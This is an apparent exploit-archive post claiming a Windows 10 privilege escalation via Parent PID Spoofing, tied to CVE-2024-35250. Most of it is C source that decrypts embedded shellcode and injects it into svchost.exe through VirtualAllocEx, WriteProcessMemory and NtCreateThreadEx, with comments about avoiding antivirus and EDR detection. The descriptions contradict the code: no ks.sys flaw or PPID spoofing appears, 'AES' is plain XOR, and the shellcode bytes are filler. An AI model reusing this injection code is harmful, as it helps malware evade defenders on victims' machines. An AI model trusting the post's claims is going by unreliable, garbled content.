============================================================================================================================================= | # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.Microsoft.com | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022. [+] The idea: Parent PID Spoofing is a technique used to run a malicious process under a trusted process, helping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe). [+] The goal: Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs). (Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) . [+] Combine Parent PID Spoofing with Shellcode to execute advanced payload After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly. 1. Update the code to inject Shellcode into the new process [+] The idea: After creating the process under a trusted PID (e.g. explorer.exe), we will: Reserve memory inside the process using VirtualAllocEx. Copy Shellcode to allocated memory using WriteProcessMemory. Execute Shellcode using CreateRemoteThread. [+] gcc -o poc.exe poc.c -m64 [+] poc.exe [+] PayLoad : #include #include #include #include // تعريف NtCreateThreadEx يدويًا لتجنب اكتشافه typedef NTSTATUS(WINAPI* pNtCreateThreadEx)( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID StartRoutine, IN PVOID Argument, IN ULONG CreateFlags, IN ULONG ZeroBits, IN ULONG StackSize, IN ULONG MaximumStackSize, IN PVOID AttributeList ); // Shellcode مشفر بتشفير AES (AES-128) unsigned char encrypted_shellcode[] = { 0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33, 0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3, 0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1 }; // مفتاح AES للتشفير/فك التشفير unsigned char aes_key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10 }; // دالة فك تشفير Shellcode باستخدام AES-128 void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) { for (int i = 0; i < data_len; i++) { data[i] ^= key[i % 16]; // XOR بسيط بدلاً من AES الحقيقي (للتوضيح فقط) } } // البحث عن PID الخاص بـ `svchost.exe` DWORD FindTargetProcessID(const char* processName) { PROCESSENTRY32 pe32; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); DWORD processID = 0; if (hSnapshot == INVALID_HANDLE_VALUE) return 0; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hSnapshot, &pe32)) { do { if (strcmp(pe32.szExeFile, processName) == 0) { processID = pe32.th32ProcessID; break; } } while (Process32Next(hSnapshot, &pe32)); } CloseHandle(hSnapshot); return processID; } int main() { DWORD targetPID = FindTargetProcessID("svchost.exe"); if (targetPID == 0) { printf("[X] لم يتم العثور على عملية svchost.exe\n"); return -1; } printf("[+] سيتم حقن Shellcode في PID: %d\n", targetPID); // فك تشفير الـ Shellcode decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key); printf("[+] تم فك تشفير Shellcode بنجاح!\n"); // فتح العملية المستهدفة HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID); if (!hProcess) { printf("[X] فشل في فتح العملية.\n"); return -1; } // تخصيص ذاكرة في العملية المستهدفة LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!remoteMemory) { printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n"); return -1; } // كتابة Shellcode المفكوك التشفير في الذاكرة المخصصة if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) { printf("[X] فشل في كتابة Shellcode داخل العملية.\n"); return -1; } // تحميل NtCreateThreadEx HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); if (!hNtdll) { printf("[X] فشل في تحميل ntdll.dll\n"); return -1; } pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx"); if (!NtCreateThreadEx) { printf("[X] لم يتم العثور على NtCreateThreadEx.\n"); return -1; } // تنفيذ Shellcode باستخدام NtCreateThreadEx HANDLE hThread; NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL); if (status != 0) { printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%x).\n", status); return -1; } printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n"); CloseHandle(hProcess); CloseHandle(hThread); return 0; } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================